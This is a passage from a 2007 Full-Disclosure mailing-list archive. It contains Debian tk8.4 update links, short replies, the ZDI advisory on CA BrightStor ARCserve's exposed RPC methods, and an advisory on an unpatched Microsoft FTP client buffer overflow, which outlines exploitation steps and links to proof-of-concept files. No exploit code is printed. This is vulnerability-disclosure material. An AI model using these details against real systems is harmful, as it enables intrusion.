http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_hppa.deb
Size/MD5 checksum:   912732 100772a425baf8736ac2e59e11a111e4
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_hppa.deb
Size/MD5 checksum:  1046506 ac02d6ea5b9249cfc8d8bd3f7905dd03

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_i386.deb
Size/MD5 checksum:   956128 8508b0b84a8a8887903ee61096c85c39
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_i386.deb
Size/MD5 checksum:   793304 9bc383580f29575f49035ec640595df4

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_ia64.deb
Size/MD5 checksum:  1053280 c1684368d5bbdc14919cb11ad26bc726
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_ia64.deb
Size/MD5 checksum:  1182358 2a0c99c93455876bf42867bc83620b00

m68k architecture (Motorola Mc680x0)

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_m68k.deb
Size/MD5 checksum:   909088 ccece33fe08dc605e03044dad3a43661
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_m68k.deb
Size/MD5 checksum:   696326 0ab235f58988c18975e43089c3e10af0

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_mips.deb
Size/MD5 checksum:   836414 48299e087ae5dc67625b27d7f0854e32
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_mips.deb
Size/MD5 checksum:   974766 

Re: [Full-disclosure] Eee PC Security

2007-11-27 Thread Michael Holstein

 Has anyone had a go with/against the Asus Eee PC?
 


SANS did a write-up on this the other day :

http://isc.sans.org/diary.html?storyid=3687

.. and they include the steps required to disable the offending services.

~Mike.



[Full-disclosure] Security Contact @ Avast!

2007-11-27 Thread Sowhat
Hi

Could anyone send me the security contact of avast!?
[EMAIL PROTECTED] does not respond.

Thanks

-- 
Sowhat
http://secway.org
Life is like a bug, Do you know how to exploit it ?



Re: [Full-disclosure] ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Expos

2007-11-27 Thread cocoruder .

it is so amazing that the vendor's advisory has been released more than one 
month ago, (see my advisory of a similar vul at 
http://ruder.cdut.net/blogview.asp?logID=221), and another thing is that I have 
tested my reported vul again after CA's patch released one month ago, but in 
fact they have not fixed it!! I report it again to CA but there is no response, 
I guess CA is making an international joke with us:), or because this product 
is so bad that they will not support it any more?
 
welcome to my blog:http://ruder.cdut.net
 
 From: [EMAIL PROTECTED]
 To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
 Date: Mon, 26 Nov 2007 16:10:30 -0600
 Subject: [Full-disclosure] ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Exposure Vulnerability
 
 ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Exposure Vulnerability
 http://www.zerodayinitiative.com/advisories/ZDI-07-069.html
 November 26, 2007
 
 -- CVE ID:
 CVE-2007-5328
 
 -- Affected Vendor:
 Computer Associates
 
 -- Affected Products:
 BrightStor ARCserve Backup r11.5
 BrightStor ARCserve Backup r11.1
 BrightStor ARCserve Backup r11.0
 BrightStor Enterprise Backup r10.5
 BrightStor ARCserve Backup v9.01
 
 -- TippingPoint(TM) IPS Customer Protection:
 TippingPoint IPS customers have been protected against this vulnerability 
 by Digital Vaccine protection filter ID 5144. For further product 
 information on the TippingPoint IPS:
 http://www.tippingpoint.com
 
 -- Vulnerability Details:
 This vulnerability allows attackers to arbitrarily access and modify the 
 file system and registry of vulnerable installations of Computer 
 Associates BrightStor ARCserve Backup. Authentication is not required to 
 exploit this vulnerability.
 
 The specific flaw exists in the Message Engine RPC service which listens 
 by default on TCP port 6504 with the following UUID:
 
 506b1890-14c8-11d1-bbc3-00805fa6962e
 
 The service exposes a number of insecure method calls including: 0x17F, 
 0x180, 0x181, 0x182, 0x183, 0x184, 0x185, 0x186, 0x187, 0x188, 0x189, 
 0x18A, 0x18B, and 0x18C. Attackers can leverage these methods to 
 manipulate both the file system and registry which can result in a 
 complete system compromise.
 
 -- Vendor Response:
 Computer Associates has issued an update to correct this vulnerability. 
 More details can be found at:
 http://supportconnectw.ca.com/public/storage/infodocs/basb-secnotice.asp
 
 -- Disclosure Timeline:
 2007.01.12 - Vulnerability reported to vendor
 2007.11.26 - Coordinated public release of advisory
 
 -- Credit:
 This vulnerability was discovered by Tenable Network Security.
 
 -- About the Zero Day Initiative (ZDI):
 Established by TippingPoint, The Zero Day Initiative (ZDI) represents a 
 best-of-breed model for rewarding security researchers for responsibly 
 disclosing discovered vulnerabilities. Researchers interested in getting 
 paid for their security research through the ZDI can find more 
 information and sign-up at:
 http://www.zerodayinitiative.com
 
 The ZDI is unique in how the acquired vulnerability information is used. 
 3Com does not re-sell the vulnerability details or any exploit code. 
 Instead, upon notifying the affected product vendor, 3Com provides its 
 customers with zero day protection through its intrusion prevention 
 technology. Explicit details regarding the specifics of the vulnerability 
 are not exposed to any parties until an official vendor patch is publicly 
 available. Furthermore, with the altruistic aim of helping to secure a 
 broader user base, 3Com provides this vulnerability information 
 confidentially to security vendors (including competitors) who have a 
 vulnerability protection or mitigation product.
 
 CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, 
 is being sent by 3Com for the sole use of the intended recipient(s) and 
 may contain confidential, proprietary and/or privileged information. Any 
 unauthorized review, use, disclosure and/or distribution by any recipient 
 is prohibited. If you are not the intended recipient, please delete 
 and/or destroy all copies of this message regardless of form and any 
 included attachments and notify 3Com immediately by contacting the sender 
 via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-11-27 Thread Rajesh Sethumadhavan
Microsoft FTP Client Multiple Bufferoverflow Vulnerability

#

XDisclose Advisory  : XD100096
Vulnerability Discovered: November 20th 2007
Advisory Reported   : November 28th 2007
Credit  : Rajesh Sethumadhavan

Class   : Buffer Overflow
  Denial Of Service
Solution Status : Unpatched
Vendor  : Microsoft Corporation
Affected applications   : Microsoft FTP Client
Affected Platform   : Windows 2000 server
  Windows 2000 Professional
  Windows XP
  (Other Versions may be also effected)

#


Overview:
A buffer overflow vulnerability has been discovered in the
Microsoft FTP client. Attackers can crash the FTP
client of the victim user by tricking the user.


Description:
A remote attacker can craft a packet with a payload in the
mget, ls, dir, username and password
commands, as demonstrated below. When the victim executes the
POC or receives specially crafted packets, the FTP client will
crash, with possible arbitrary code execution in the context of
the logged-in user. This vulnerability is hard to exploit
since it requires social engineering and the shellcode has
to be injected as an argument to the vulnerable commands. 

The vulnerability is caused by an error in the
Windows FTP client in validating commands like mget,
dir, user, password and ls.

Exploitation method:

Method 1:
-Send POC with payload to user.
-Social engineer victim to open it.

Method 2:
-Attacker creates a directory with long folder or
filename in his FTP server (should be other than IIS
server)
-Persuade victim to run the command mget, ls or
dir  on specially crafted folder using microsoft ftp
client
-FTP client will crash and payload will get executed


Proof Of Concept:
http://www.xdisclose.com/poc/mget.bat.txt
http://www.xdisclose.com/poc/username.bat.txt
http://www.xdisclose.com/poc/directory.bat.txt
http://www.xdisclose.com/poc/list.bat.txt

Note: Modify POC to connect to lab FTP Server
  (As of now it will connect to
ftp://xdisclose.com)

Demonstration:
Note: Demonstration leads to crashing of Microsoft FTP
Client

Download POC rename to .bat file and execute anyone of
the batch file
http://www.xdisclose.com/poc/mget.bat.txt
http://www.xdisclose.com/poc/username.bat.txt
http://www.xdisclose.com/poc/directory.bat.txt
http://www.xdisclose.com/poc/list.bat.txt


Solution:
No Solution

Screenshot:
http://www.xdisclose.com/images/msftpbof.jpg


Impact:
Successful exploitation may allow execution of
arbitrary code with the privileges of the currently logged-in
user.

Impact of the vulnerability is system level.


Original Advisory:
http://www.xdisclose.com/advisory/XD100096.html

Credits:
Rajesh Sethumadhavan has been credited with the
discovery of this vulnerability


Disclaimer:
This entire document is strictly for educational,
testing and demonstrating purpose only. Modification
use and/or publishing this information is entirely on
your own risk. The exploit code/Proof Of Concept is to
be used on test environment only. I am not liable for
any direct or indirect damages caused as a result of
using the information or demonstrations provided in
any part of this advisory.



  
